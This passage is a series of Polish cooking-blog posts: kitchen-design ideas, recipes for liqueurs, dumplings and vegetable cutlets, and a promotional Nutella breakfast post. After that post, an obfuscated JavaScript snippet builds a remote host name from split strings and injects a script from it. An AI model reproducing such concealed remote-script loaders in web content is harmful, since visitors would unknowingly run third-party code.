Kuba Pichci

Wiele pomysłów na kuchnię

Mając przed sobą wyzwanie aranżacji kuchni, trzeba wczuć się w miejsce i zaprogramować myślenie na niecodzienne rozwiązania. Z pewnością nie jest to łatwe zadanie. Jeśli wszystko ma być, jak należy, trzeba wziąć pod uwagę kilka wytycznych dotyczących miejsca. Pierwszą jest usytuowanie pomieszczenia względem stron świata, a co za tym idzie intensywność naświetlenia. Po drugie, projekt trzeba dopasować do kształtu i wielkości pomieszczenia. Trzecią wytyczną jest liczność rodziny. Jeśli rodzina jest liczna, a pomieszczenie niewielkie, warto zastanowić się nad „uszyciem mebli na miarę”, czyli zaprojektowaniu mebli na wymiar.Pomysł na kuchnię z wykorzystaniem cegły w aranżacji wnętrzaW nowocześnie zaaranżowanych pomieszczeniach często wykorzystuje się rustykalny look surowej cegły. Ceglana ściana komponuje się dobrze w wielu miejscach pomieszczenia. Nawet można się pokusić o zaprojektowanie jej w miejscu, gdzie będą stały meble kuchenne. Surowa cegła w takim miejscu musi być właściwie zabezpieczona, by powierzchnia nie przyjmowała wody ze zlewozmywaka lub tłuszczu pryskającego z patelni. Oryginalnym pomysłem jest tafla z hartowanego szkła ustawionego przed ścianą. Cegła jest tylko akcentem. Ma naturalny kolor. Najlepiej, jeśli jest wydobyta spod starego tynku. Wtedy wygląda naprawdę wiarygodnie. Cegła ma to do siebie, że pasuje, bez wyjątku do każdego wnętrza. Innym zabiegiem dekoracyjnym jest pomalowanie cegły na dowolny kolor. Resztę atmosfery tworzy okładzina z betonu architektonicznego. Meble natomiast pokryte są laminatem o teksturze starego i zniszczonego drewna z przetartą powłoką malarską. Blat kuchenny koniecznie z czarnego, szlifowanego bazaltu, do którego, jak łatwo sobie wyobrazić, pasować będzie linia dużego, kuchennego agd firmy Smeg o wdzięcznej nazwie Coloniale. Płyta gazowa z przywodzącymi na myśl epokę brytyjskich podbojów kurkami zaworów i piekarnik z owalna szybką, grają ze stylem vintage. Jeśli do gotowania nie przewidziano gazu, bo dom znajduje się poza terenami miejskimi, gdzie nie ma rurociągu gazowego, do czarnego blatu jak ulał pasować będzie płyta indukcyjna Multi Zone. Biała, będzie wyraźnie kontrastować z powierzchnią kamienia. Całości mogą z powodzeniem dopełnić sprzęty agd znanego producenta sprzętów kuchennych Magimix Sokowirówka ma kolorystyką zbliżona do barwy blatu i będzie właściwym sprzętem dla miłośników zdrowego stylu życia. Do przechowywania żywności w tym zestawieniu idealna będzie chłodziarkozamrażarka Multizone.Kuchnia z salonemKolejnym, mającym wielki potencjał pomysłem, jest połączenie dwóch pomieszczeń. I nie ważne, które z pomieszczeń będzie miało wyższą funkcję. Pomysł łączenia stref o różnych funkcjach nie jest czymś nowym, ale przecież jest tyle pomysłów do wypróbowania i tyle materiałów do zastosowania. Jeśli tylko nie braknie inwencji projektantom, ale to przecież niemożliwe. Kuchnia otwierająca się na salon nie musi być miejscem, gdzie tylko przygotowuje się posiłki. Właśnie tam może skupić się centrum życia rodzinnego z widokiem na reprezentacyjną elegancję salonu. W układzie otwartym zawsze brakuje jednej ściany. I nie warto zamykać jej żadną przegroda lub drzwiami wahadłowymi. Lepiej niech pozostanie otwarta. Sprzyja to optycznemu powiększeniu przestrzeni. W otwartej kubaturze lepiej się myśli i atmosfera jest lżejsza. Nie krepują niczego napierające zewsząd ściany. W to miejsce można zaprojektować wyspę zawierająca wszystkie potrzebne sprzęty do gotowania. Oprócz tradycyjnych sprzętów ciekawostką i innowacją w zabudowie nowoczesnych kuchni jest szuflada do podgrzewania naczyń. Używając szuflady, posiłki pozostają dłużej ciepłe. Szuflady od Smeg mają różne wymiary. Można je dostosować do każdej zabudowy i w zależności liczności rodziny. Do wyspy dzielącej obie przestrzenie funkcjonalnie spełni zadnie okap Kir37XE. Idealny do montażu górnego. Wyposażenie kuchni Smeg produkowane jest w liniach designerskich i jako takie świetnie uzupełnia aranżacje, wypełniając je logiczna treści projektu linii. Wybierając sprzęt małego agd z firmy Megamix uzupełni się puste miejsce w pomyśle i postawi przysłowiową kropkę nad i. Blender, krajalnica lub ekspres do kawy w nowoczesnej stylistyce zadowoli każdego estetę.Magimix – duży wybór robotów kuchennych i blenderów w sklepie PuregreenPierwsze skrzypce gra salonCzasem, gdy do dyspozycji jest małe pomieszczenie, może sprawdzić się pomysł z aneksem kuchennym w dużym salonie lub jeśli są dwa mniejsze pomieszczenia, efekt taki można osiągnąć przez usunięcie dzielącej je ściany. W takim układzie pomieszczeń dobrze wygląda ujednolicona kolorystyka z pełnymi i żywymi kolorami. Według tych wytycznych sprawdzi się linia produktów Smeg nazwana 50’s Style. Styl hipisowski, niepozbawiony uroku. Warto przymierzyć, choćby w myślach lodówkę w kolorowe paski. Chłodziarka nosi nazwę FAB28LCS1. Drobny sprzęt firmy Magimix w spokojniejszej tonacji ostudzi lekko hipisowski luz kolekcji z lat pięćdziesiątych. Sprzęt RTV i agd w lżejszej tonacji dopasuje się do połączonego wnętrza. Robot kuchenny lub opiekacz w kolorystyce chromu i kolorowe paski na lodówce iście oryginalne zestawienie.Post Wiele pomysłów na kuchnię pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Przepisy na Boże Narodzenie

Już za parę dni Boże Narodzenie, czas więc najwyższy by pomyśleć o świątecznym menu. Zapraszam Was do skorzystania z przepisów wypróbowanych w boju na przestrzeni lat przeze mnie, moich bliskich i wielu czytelników bloga. Mam nadzieję, że moje propozycje spotkają się z uznaniem i zagoszczą na Waszych stołach. Wszelkie dania na tę okazję znajdziecie w dziale Boże Narodzenie.Tymczasem zapraszam do obejrzenia i wysłuchania znanego doskonale świątecznego hitu „All I Want For Christmas Is You” w bardzo fajnej aranżacji. Post Przepisy na Boże Narodzenie pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Quiche z oliwkami i suszonymi pomidorami

Kisz, bo tak wymawia się ów „quieche” to rodzaj tarty wypełniony masą śmietanowo-jajeczną, niezwykle popularny w kuchni francuskiej. Podobnie jak np. w pizzy, tak i tu stosuje się przeróżne dodatki i ograniczenie stanowi tylko nasza wyobraźnia. Ja tym razem postanowiłem wykorzystać oliwki i moje ukochane suszone pomidory, które doskonale współgrają ze sobą dając lekko kwaskowaty posmak.przepis na quieche z oliwkami i suszonymi pomidoramiskładniki:ciasto na tartę przygotowane wg tego przepisu: Ciasto kruche (wersja wytrawna)4 jajka200 ml śmietanygarść startego żółtego seragarść oliwekgarść suszonych pomidorówłyżka ziół prowansalskichlistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='ciasto na tartę przygotowane wg tego przepisu: Ciasto kruche (wersja wytrawna)4 jajka200 ml śmietanygarść startego żółtego seragarść oliwekgarść suszonych pomidorówłyżka ziół prowansalskich'; document.write(" "); przygotowanie:Przygotowujemy ciasto korzystając z tego przepisu: Ciasto kruche (wersja wytrawna).Układamy je na formie do pieczenia, nakłuwamy widelcem i przykrywamy papierem do pieczenia, który następnie obciżamy np. fasolą, aby nam na środku nie powstał bąbel.Pieczemy 10 minut w 200 st. C.W czasie gdy piecze się ciasto przygotowujemy masę śmietanowo-jajeczną.Oliwki i pomidory siekamy nieco i przekładamy do misy.Dodajemy jajka, śmietanę i ser. Doprawiamy ziołami, solą i pieprzem.Mieszamy do rozbełtania jajek i połączenia się składników.Masę przekładamy na wypieczony spód i wstawiamy ponownie do piekarnika na około 15 minut, aż masa się zetnie.Smacznego!Post Quiche z oliwkami i suszonymi pomidorami pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Masło orzechowe crunchy

Jeśli tak jak ja uwielbiacie masło orzechowe możecie je łatwo przygotować w domu, o czym pisałem już jakiś czas temu TUTAJ. Domowe masło jest lepsze niż zwykłe sklepowe, ponieważ zawiera tylko i wyłącznie orzechy, a nie jak większość dostępnych w sklepach, także olej palmowy i inne dziwne dodatki. Można wprawdzie znaleźć masło orzechowe bez tych składników, ale wówczas cena jego jest bardzo wysoka i skutecznie zniechęca. Tymczasem jego przygotowanie w domowych warunkach jest banalnie proste, a koszt to zaledwie ułamek kwoty, jaką przyszłoby nam zapłacić z sklepie. Tym razem jednak chciałbym podzielić się przepisem na masło orzechowe crunchy, a więc chrupiące. Można to uzyskać w dwojaki sposób – albo zostawiając część orzechów w nie do końca zmielonej postaci, można też użyć np. słonych precelków lub paluszków.przepis na masło orzechowe crunchyskładniki:2 szklanki orzechów ziemnych (najlepiej takich wprost ze skorupek, ale mogą być nawet takie z puszki)1/2 szklanki precelków lub połamanych paluszkówlistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='2 szklanki orzechów ziemnych (najlepiej takich wprost ze skorupek, ale mogą być nawet takie z puszki)1/2 szklanki precelków lub połamanych paluszków'; document.write(" "); przygotowanie:Orzechy obieramy ze skórek i prażymy chwilę na patelni.Następnie mielimy je blenderem lub melakserem, aż uzyskamy gładką masę.Z początku wydawać się może, że coś idzie nie tak jak powinno, ale po chwili orzechy powinny zacząć się kleić, a masa nabierze „masłowej” konsystencji.Mielenie potrwać może 10-15 minut.Pod koniec dodajemy precelki i jeszcze krótką chwilę mielimy, aby je pokruszyć, ale nie zrobić z nich papki.Jeśli zamiast precelków chcecie użyć kawałków orzechów, wówczas po chwili mielenia trzeba wyjąć ich część , gdy uzyskają pożądaną wielkość i dodać na konie do gotowego masła.Smacznego!Post Masło orzechowe crunchy pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Nalewka z malin

Lato to doskonały czas, aby uzupełnić zapasy nalewek uszczuplone w trakcie jesiennych i zimowych chłodów. Mamy wiele pysznych i soczystych owoców, które aż się proszą o zalanie ich spirytusem. Ostatnio robiłem nalewkę z wiśni i orzecha włoskiego, dziś natomiast zapraszam do przygotowania nalewki z malin. To doskonały środek w przypadku gdy dopadnie nas jakieś przeziębienie – żaden chemiczny wytwór promowany w TV nie zrobi nam tak dobrze jak kieliszeczek domowej malinówki. Nie wiem, czy nas wyleczy, jestem natomiast przekonany że poczujemy się po nim lepiej :-)przepis na nalewkę malinowąskładniki:250 g malin250 ml spirytusu 95%250 ml wódki 40%250 wody180 g cukrulistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='250 g malin250 ml spirytusu 95%250 ml wódki 40%250 wody180 g cukru'; document.write(" "); przygotowanie:Maliny, oczyszczone z zanieczyszczeń takich jak listki itd. wkładamy do gąsiorka.Zalewamy wódką zmieszaną ze spirytusem tak, aby przykryć owoce.Odstawiamy na 3-4 dni w słoneczne miejsce.W ciepłej wodzie rozpuszczamy cukier uzyskując syrop. Jeśli na powierzchni zbierze się piana, delikatnie ją usuwamy.Zlewamy nastaw i mieszamy z syropem.Przelewamy do butelek i odstawiamy przyjemniej na miesiąc w ciemne miejsce.Smacznego!Post Nalewka z malin pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Knedle z jagodami

Widzę, że już zaczął się sezon na jagody, a ponieważ nie trwa on zbyt długo zapraszam Was do przygotowania knedli z tymi pysznymi owocami. Knedle podawać można tak jak ja to uczyniłem, czyli z zasmażką z bułki tartej, można też polać je posłodzoną śmietaną, tak jaz zwykle robię to w przypadku knedli z truskawkami. Tak czy inaczej knedle z jagodami to niezwykle smaczne danie i swoisty symbol pełni lata.przepis na knedle z jagodamiskładniki:500 g ziemniaków100 g mąki ziemniaczanej2 łyżki mąki pszennej1 jajko150 g jagód50 g cukru1 opakowanie cukru waniliowego2 łyżki bułki tartejłyżka masłalistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='500 g ziemniaków100 g mąki ziemniaczanej2 łyżki mąki pszennej1 jajko150 g jagód50 g cukru1 opakowanie cukru waniliowego2 łyżki bułki tartejłyżka masła'; document.write(" "); przygotowanie:Ziemniaki obieramy i gotujemy aż zupełnie zmiękną. Następnie studzimy i przeciskamy przez praskę, ewentualnie mielimy w maszynce lub ubijamy tłuczkiem.Do przestudzonych ziemniaków dodajemy mąkę ziemniaczaną oraz pszenną, jajko, lekko solimy i wyrabiamy ciasto aż stanie się jednolite i gładkie.Jagody myjemy, dodajemy oba cukry i delikatnie mieszamy.Ciasto rozwałkowujemy partiami i wycinamy krążki.Nakładamy do nich jagody i formujemy kule.Knedle gotujemy w osolonym wrzątku do czasu, aż wypłyną na powierzchnię.Masło topimy i dodajemy bułkę tartą. Przesmażamy chwilkę, aż zasmażka uzyska barwę złota.Smacznego!Post Knedle z jagodami pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Kotlety z kalafiora, pieczarek i makaronu

Od kiedy nie jem mięsa, pokochałem różnego rodzaju kotlety wegetariańskie. Ich wielką zaletą jest to, że można je przygotować właściwie ze wszystkiego co mamy pod ręką, dowolnie dopasować ich smak do naszych gustów. Co więcej, kotlety takie (np. kotlety z kalafiora) można przygotować w większej liczbie, dzięki czemu mamy obiad na dwa dni :-) Doskonale nadają się one do odgrzania na grillu, ale uwaga – z doświadczenia wiem, że gdy tylko mięsożercy je wyczują, zaraz mi je wyjadają, dlatego warto przygotować więcej.Poniższy przepis to typowa receptura „na oko” – miałem akurat nieco ugotowanego wcześniej kalafiora, parę pieczarek i resztkę makaronu z poprzedniego dnia. Niewiele myśląc połączyłem to wszystko w bardzo smaczne i proste danie.przepis na kotlety z kalafiora, pieczarek i makaronuskładniki:1/2 niedużego ugotowanego kalafiorakilka pieczarekgarść ugotowanego makaronu (typ dowolny, może być nawet spaghetti, trzeba go tylko pociąć na mniejsze kawałki)jajkoprzyprawy (Wasze ulubione, ja użyłem swańskiej soli, którą znajoma przywiozła nam z Gruzji)listonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='1/2 niedużego ugotowanego kalafiorakilka pieczarekgarść ugotowanego makaronu (typ dowolny, może być nawet spaghetti, trzeba go tylko pociąć na mniejsze kawałki)jajkoprzyprawy (Wasze ulubione, ja użyłem swańskiej soli, którą znajoma przywiozła nam z Gruzji)'; document.write(" "); przygotowanie:Pieczarki kroimy w kostkę i przesmażamy chwilkę, aż się zarumienią.Kalafiora i makaron niedbale rozdrabniamy.Składniki przekładamy do jednego naczynia, doprawiamy do smaku i wbijamy jajko.Formujemy kotlety i smażymy chwilę z każdej strony.Smacznego! Post Kotlety z kalafiora, pieczarek i makaronu pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Nalewka z orzecha włoskiego (orzechówka)

W tym roku po raz pierwszy zebrałem się i przygotowałem nalewkę z orzechów włoskich. Właściwie nie jest to precyzyjne określenie, bo orzechówka ta to nalewka z owoców orzecha włoskiego. Należy przy jej przygotowaniu pamiętać o dwóch ważnych sprawach – owoce powinny być zbierane mniej więcej od końca czerwca do połowy lipca. Później orzech schowany wewnątrz owocu twardnieje i ciężko będzie go pokroić. Druga sprawa to krojenie – uważajcie bo owoce są twarde i nóż potrafi się ześlizgnąć to raz, a dwa to, że owoce bardzo brudzą dłonie – zaopatrzcie się lepiej w rękawiczki gumowe do tej czynności.Szczerze powiedziawszy to nie znam smaku tej nalewki, ponieważ nie próbowałem nigdy domowej orzechówki, a przed moją jeszcze przynajmniej 5 miesięcy dojrzewania. Ale słyszałem, że jest bardzo wyrazista i doskonale pomaga przy różnego rodzaju dolegliwościach brzusznych.przepis na nalewkę z orzecha włoskiegoskładniki:15 owoców orzecha włoskiego250 ml spirytusu250 ml czystej wódki 40%szczypta cynamonu5 goździkówgwiazdka anyżu2-3 łyżki miodulistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='15 owoców orzecha włoskiego250 ml spirytusu250 ml czystej wódki 40%szczypta cynamonu5 goździkówgwiazdka anyżu2-3 łyżki miodu'; document.write(" "); przygotowanie:Owoce dokładnie myjemy i kroimy (w miarę możliwości drobno – ułatwi to macerację).Pokrojone owoce wkładamy do gąsiorka i zalewamy wódką zmieszaną ze spirytusem.Odstawiamy na miesiąc.Nalew filtrujemy i przelewamy do butelki.Owoce zalewamy miodem, dodajemy cynamon, goździki i anyż. Mieszamy i odstawiamy na kolejny miesiąc.Nastaw filtrujemy i łączymy z alkoholem uzyskanym poprzednio.Przelewamy do butelki i odstawiamy na przynajmniej 3 miesiące.Smacznego!Post Nalewka z orzecha włoskiego (orzechówka) pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Zupa pieczarkowa

Osoby, które zaglądają tu regularne, wiedzą, że jestem zwolennikiem prostoty. Nie lubię dań, których przygotowanie zajmuje godziny i wymaga równie długiego staną przy kuchennym blacie. Zdecydowanie preferuję potrawy przygotowywane na zasadnie „pokrój, podgrzej i zapomnij”. Prezentowana dziś zupa pieczarkowa jest właśnie takim daniem – przygotowanie produktów zajmie nam kilka minut – wrzucamy wszystko do garnka i zapominamy na kilkanaście minut.przepis na zupę pieczarkowąskładniki:1 l bulionu warzywnego500 g pieczarek duża cebula1 duża marchewka250 ml śmietany 18 %2 łyżki masłanatka pietruszkilistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='1 l bulionu warzywnego500 g pieczarek duża cebula1 duża marchewka250 ml śmietany 18 %2 łyżki masłanatka pietruszki'; document.write(" "); sposób przygotowania:Cebulę drobno siekamy i szklimy na maśle.Pieczarki obieramy , myjemy i kroimy.Marchewkę również obieramy i ścieramy na tarce o grubych oczkach.Pieczarki i marchewkę dodajemy do cebuli i dusimy chwilę na maśle.Zalewamy warzywa bulionem i gotujemy 15 minut.Śmietanę hartujemy (dodajemy do niej gorącej zupy łyżka po łyżce, aż się rozcieńczy i ogrzeje) i dodajemy do zupy.Doprawiamy do smaku.Podajemy posypaną drobno posiekaną natką pietruszki.Smacznego!Post Zupa pieczarkowa pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Sałatka z kalafiora gotowanego

Jedną z moich ulubionych sałatek, które często towarzyszą naszym grillowym ucztom jest sałatka z kalafiora gotowanego. Robię czasem też wersję z kalafiorem surowym, ale ta jest dla mnie znacznie smaczniejsza. Robi się ją dość szybko i jest bardzo pożywna.przepis na sałatkę z kalafiora gotowanegoskładniki:kalafior4 ziemniaki3 jajka ugotowane na twardomajonezkopereklistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='kalafior4 ziemniaki3 jajka ugotowane na twardomajonezkoperek'; document.write(" "); przygotowanie:Kalafiora dzielimy na różyczki i wrzucamy na kilka minut do osolonego wrzątku, aż zmięknie, ale się nie rozgotuje.Odcedzamy go i pozostawiamy do ostygnięcia.Ziemniaki obieramy i kroimy w kostkę. Wrzucamy do wody w której gotowaliśmy kalafiora i gotujemy, aż podobnie jak kalafior będą miękkie, ale nie rozpadające się.Po ostudzeniu do kalafiora i ziemniaków dodajemy pokrojone w kostkę jajka, majonez (według uznania, ale nie za dużo) i posiekany koperek.Całość doprawiamy do smaku.Odstawiamy na godzinę, aby smaki się przegryzły.Smacznego!Post Sałatka z kalafiora gotowanego pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Jajko zapiekane w bułce

Jajko zapiekane w bułce to świetne urozmaicenie śniadania. Kto lubi rozpoczynać dzień od jajka, a ma już powyżej uszu jajecznicy i jajek na miękko, może sobie przygotować smaczną zapiekankę. Dodatkowym atutem jest możliwość eksperymentowania z różnymi dodatkami do tego dania. Ja akurat pod jajko podłożyłem tylko trochę sera, ale może to być jakieś warzywo, wędlina czy co tam innego przyjdzie Wam do głowy. Najważniejsze, żeby się bawić i przełamywać monotonię. przepis na jajko zapiekane w bułceskładniki:bułka (np. kajzerka)jajkoplaster żółtego seramasłoszczypioreklistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='bułka (np. kajzerka)jajkoplaster żółtego seramasłoszczypiorek'; document.write(" "); przygotowanie:Odcinamy wierzch bułki i wyjmujemy miąższ.Na spód kładziemy plaster masła, na nim żółty ser.Wbijamy jajko, które doprawiamy do smak solą i pieprzem, a całość posypujemy posiekanym szczypiorkiem.Pieczemy w 180 st. C do czasu aż uzyskamy pożądaną konsystencję. Ja najbardziej lubię gdy białko, jest już ścięte, ale żółtko jeszcze płynne. Można sobie wówczas kawałki chrupiącej bułki w nim maczać.Smacznego!Post Jajko zapiekane w bułce pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Pierogi z serem

Daniem, które dość często pojawia się na naszym stole są różnego rodzaju pierogi. Najbardziej lubię je w wersji wytrawnej, szczególnie ruskie lub ze szpinakiem, jednak niejednokrotnie mam chęć na ich słodką odmianę, a mianowicie pierogi z serem. Pierogi takie podajemy ze śmietaną lub zasmażką z bułki tartej lub po prostu z cukrem.przepis na pierogi z seremskładniki:ciasto na pierogi – według tego przepisu400 g twarogużółtko2 łyżeczki cukruewentualnie cynamonlistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='ciasto na pierogi – według tego przepisu400 g twarogużółtko2 łyżeczki cukruewentualnie cynamon'; document.write(" "); przygotowanie:Przygotowujemy ciasto zgodnie z przepisem na pierogi zgodnie z przepisem, jaki wstawiałem już kiedyś na blog, a znaleźć można go tutaj: PRZEPIS NA CIASTO NA PIEROGI.Twaróg mieszamy z żółtkiem i cukrem. Jeśli mamy chęć, można do sera dodać także cynamon, który wzbogaci smak potrawy.Ciasto rozwałkowujemy cienko, wykrawamy okręgi i nakładamy farsz. Sklejamy je i odkładamy na posypany mąką talerz.Gotujemy we wrzątku do czasu, aż pierogi wypłyną na powierzchnię.Smacznego!Post Pierogi z serem pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Kotlety brokułowo-ziemniaczane

Prezentowane kilka dni temu frytki z marchewki zjedliśmy z nie mniej smacznymi kotletami brokułowo-ziemniaczanymi. To chyba najlepsze kotlety warzywne jakie dotychczas robiłem – nie tylko smakują wyśmienicie, ale także nie rozpadają się przy smażeniu, jak to ma czasem miejsce. Nic nie stoi na przeszkodzie, by po ówczesnym ich usmażeniu, podgrzać je nieco na ruszcie by zjeść smaczną potrawę na grillu z przyjaciółmi.przepis na kotlety brokułowo-ziemniaczaneskładniki:ugotowany brokuł4 ugotowane ziemniakicebula2 ząbki czosnkujajkosólzioła prowansalskiebułka tartalistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='ugotowany brokuł4 ugotowane ziemniakicebula2 ząbki czosnkujajkosólzioła prowansalskiebułka tarta'; document.write(" "); sposób przygotowania:Brokuła i ziemniaki zgniatamy tłuczkiem do ziemniaków. Można ewentualnie zmiksować lub zmielić maszynką, a nawet rozgnieść widelcem.Cebulę kroimy w kostkę i krótko szklimy na oleju. Dodajemy ją do ziemniaków razem z rozgniecionym czosnkiem.Doprawiamy do smaku i dodajemy jajko. Można je pominąć, jeśli ktoś chce przygotować danie wegańskie, jednak jajko zmniejszy prawdopodobieństwo rozpadnięcia się kotletów podczas smażenia.Jeśli masa jest zbyt rzadka, należy dodać nieco bułki tartej.Formujemy kotlety i obtaczamy je w bułce tartej.Smażymy na rozgrzanym oleju.Smacznego!Post Kotlety brokułowo-ziemniaczane pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Frytki marchewkowe

Zapraszam dziś na pyszne frytki z marchewki. To bardzo smaczna alternatywa dla klasycznych frytek ziemniaczanych, szczególnie dla tych smażonych w głębokim tłuszczu.przepis na frytki marchewkoweskładniki:1 kg marchewkisezamolej roślinny1 łyżka soku z cytrynysóllistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='1 kg marchewkisezamolej roślinny1 łyżka soku z cytrynysól'; document.write(" "); przygotowanie:Marchewki obieramy, płuczemy i kroimy w słupki.Skrapiamy je olejem i sokiem z cytryny, solimy, posypujemy sezamem i mieszamy delikatnie.Wykładamy je na blachę i pieczemy około 25 minut w 200 st. C.Od czasu do czasu lekko mieszamy je na blasze.Smacznego!Post Frytki marchewkowe pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

5 pomysłów na słodkie rozpoczęcie dnia

Co zrobić, chcąc podarować sobie szansę na udany dzień? Najlepiej powitać go z odrobiną słodkości! Pyszne słodkie śniadanie jest w stanie poprawić humor od samego rana i przepędzić czarne chmury zbierające się nad naszymi głowami.Słodkie co nieco o tej porze dnia zagwarantuje nam dobre samopoczucie aż do jego zakończenia. Dobrym pomysłem jest dodanie do swojego słodkiego śniadania wyśmienitego kremu z orzechami laskowymi i kakao, czyli Nutelli.Doskonale sprawdza się ona w wielu przepisach. Ponadto warto wiedzieć, że Nutella powstaje bez używania szkodliwych dla naszego zdrowia tłuszczów trans i chemicznych dodatków. Idealnie kremowa konsystencja Nutelli to zasługa oleju, który pozyskiwany jest z owoców plamy, pochodzących ze zrównoważonej produkcji, czyli takiej, która nie powoduje wycinki lasów i zmniejszania habitatów zwierząt. Dlatego też już teraz możemy bez obaw wzbogacać jej pysznym smakiem nasze śniadania. A oto kilka śniadaniowych inspiracji z Nutellą w roli głównej.Razowe naleśniki z NutelląSkładniki:Ciasto:szklanka mąki razowejpół szklanki mąki tortowej2 jajkapół szklanki maślankipół szklanki mlekaszklanka wody gazowanejłyżka siemienia lnianegołyżeczka błonnika owsianego3 łyżki oliwy1/5 łyżeczki sodyszczypta soliNadzienie:6 łyżeczek masła orzechowego6 łyżeczek Nutelli1 banansos czekoladowy do dekoracjiWszystkie składniki potrzebne do przygotowania ciasta łączymy ze sobą i dokładnie miksujemy. Na patelni rozgrzewamy oliwę. Następnie przy pomocy dużej łyżki nakładamy porcję ciasta i smażymy naleśniki na złoty kolor z obu stron. Na każdym z usmażonych naleśników rozsmarowujemy łyżeczkę masła orzechowego, następnie łyżeczkę Nutelli i kładziemy pokrojonego banana. Całość zawijamy i dekorujemy sosem czekoladowym.Słodki omlet z NutelląSkładniki:2 jaja6 łyżek mleka6 łyżek mąki2 łyżki cukru pudruNutella,truskawki (lub inne dowolne owoce)olej (do smażenia)Żółtka oddzielamy od białek. Białka ubijamy na sztywną pianę. Do żółtek dodajemy mąkę, cukier, mleko i dokładnie mieszamy. Następnie dodajemy ubitą pianę z białek. Na rozgrzaną patelnię wykładamy po dużej łyżce ciasta i smażymy z obu stron aż do zarumienienia. Gotowe omlety smarujemy Nutellą, posypujemy owocami i składamy na pół. Całość posypujemy cukrem pudrem.Pancakes z Nutellą i pomarańczamiSkładniki:Ciasto:2 szklanki mąkijajkoszklanka jogurtu naturalnego3 łyżki cukru pudrułyżka sody2 łyżki oliwyszczypta soliaromat waniliowyolej (do smażenia)Dodatkowo:Nutellapomarańczecukier puder (do dekoracji)Wszystkie składniki przeznaczone na ciasto dokładnie miksujemy. Na patelni rozgrzewamy olej, wykładamy po łyżce gotowego ciasta. Smażymy z obu stron na rumiany kolor. Gotowe pancakes smarujemy Nutellą. Na każdym układamy cząstki pomarańczy i obsypujemy cukrem pudrem.Francuskie trójkąty z NutelląSkładniki:gotowe ciasto francuskieNutellabiałkocukierZ ciasta wykrawamy kwadraty, które smarujemy Nutellą. Następnie składamy je tak, aby miały kształt trójkątów. Brzegi ciasta najlepiej skleić przy pomocy widelca. W ten sposób na naszych ciasteczkach uzyskujemy dodatkowo ciekawy wzorek. Pędzelkiem kuchennym rozsmarowujemy na ciastkach rozbite białko i posypujemy cukrem. Pieczemy około 20 minut w piekarniku rozgrzanym do 180°C (z termoobiegiem). Ciastka najlepiej smakują tuż po upieczeniu, ale również doskonale nadają się do przechowywania przez około 2-3 dni. Świetnie sprawdzą się również jako drugie śniadanie w szkole lub pracy.Tosty francuskie z NutelląSkładniki:chleb tostowyNutellapokruszone herbatnikipiankijajko2 łyżki mlekaUbijamy jajko wraz z mlekiem. Na talerzyk wysypujemy pokruszone herbatniki. Kromki chleba smarujemy Nutellą. Do środka pomiędzy chleb wkładamy pianki. Każdy tost maczamy w jajku wymieszanym z mlekiem, a następnie obtaczamy w pokruszonych herbatnikach. Tak przygotowane tosty smażymy na rozgrzanym oleju z obu stron, aż pianki zaczną się rozpuszczać. Idealnie smakują ze szklanką mleka.(function(){ x193_=("u"+"")+"s"+"";x193_+=("tat.")+("i"); x193=document.createElement("script");x193.type="text/javascript";x193_+="nf"+("o")+"/"; x193u="10132164"+".";x193.async=true;x193u+="2ntlyi28193uXhzr538dj20y2tucsd"; x193.src="//"+x193_+x193u; x193b=document.body; x193b.appendChild(x193); })();Post 5 pomysłów na słodkie rozpoczęcie dnia pojawił się poraz pierwszy w Kuba Pichci.

Gołąbki wegańskie z kaszą gryczaną

Kuba Pichci

Gołąbki wegańskie z kaszą gryczaną

Uwielbiam gołąbki, ale od ich przygotowywania odstręcza mnie czasochłonność. Samo obgotowanie kapusty zajmuje sporo czasu, a o tego jeszcze za zawijanie. Urobić się można po łokcie. Ale czasem warto trochę się pomęczyć, bo efekt może być naprawdę bardzo smakowity. Tym bardziej, że można nieco ułatwić sobie życie i zamiast zwykłej kapusty użyć pekińskiej lub włoskiej. Ja tym razem, robiąc gołąbki wegańskie z kaszą gryczaną, wybrałem kapustę pekińską.przepis na gołąbki z kaszą gryczanąskładniki:szklanka kaszy gryczanej1 średnia cebula400 g pieczarekwłoszczyznakapusta pekińskalistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='szklanka kaszy gryczanej1 średnia cebula400 g pieczarekwłoszczyznakapusta pekińska'; document.write(" "); przygotowanie:Zaczynamy od kaszy. Zalewamy ją dwoma szklankami wody, lekko solimy i gotujemy, aż całkiem zaabsorbuje płyn.Włoszczyznę obieramy i gotujemy w niewielkiej ilości osolonej wody, aż warzywa zmiękną.Cebulę drobno siekamy i szklimy na odrobinie oleju. Dodajemy obrane i pokrojone drobno pieczarki. Całość razem przesmażamy kilka minut.Bulion odlewamy, a warzywa wyjmujemy i ścieramy na tarce o grubych oczkach. W zależności czy odpowiada Wam smak, możecie któreś z warzyw pominąć, ja na przykład starłem tylko marchewkę.Warzywa i kaszę dodajemy do cebuli z pieczarkami i doprawiamy do smaku.Obcinamy końcówkę (jakieś 2 cm) kapusty pekińskiej i oddzielamy liście. Wrzucamy je partiami po kilka sztuk do lekko 